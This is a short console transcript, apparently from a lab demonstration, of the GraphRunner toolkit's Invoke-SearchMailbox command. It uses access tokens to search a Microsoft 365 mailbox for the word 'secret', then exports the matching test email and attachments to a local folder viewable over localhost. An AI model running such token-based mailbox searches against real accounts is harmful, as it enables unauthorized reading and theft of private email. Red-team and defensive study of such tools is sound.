PS C:\Users\beau\Desktop\GraphRunner\GraphRunner_Outputs> Invoke-SearchMailbox -Tokens $tokens -SearchTerm "secret"
[*] Using the provided access tokens.
[*] Found 1 match for search term secret
Subject: Super Secret Data | Sender: Beau@tyrellcorporation.io | Receivers: Dark Magician | Date: 2023-08-10T19:59:13Z | Message Preview: Here's some super secret data...   Testing some super secret data over here.  -Beau -- ...
================================================================================
[*] Do you want to download these emails and their attachments? (Yes/No)
yes
[*] Downloading messages...
[*] Downloading Super_Secret_Data
[*] Emails and attachments have been exported to the folder mailsearch-20240618095931.
[*] A simple emailviewer.html has been provided to view the exported emails.
[*] To use it run the Invoke-HTTPServer module in the mailsearch-20240618095931 directory and then navigate to http://localhost:8000/emailviewer.html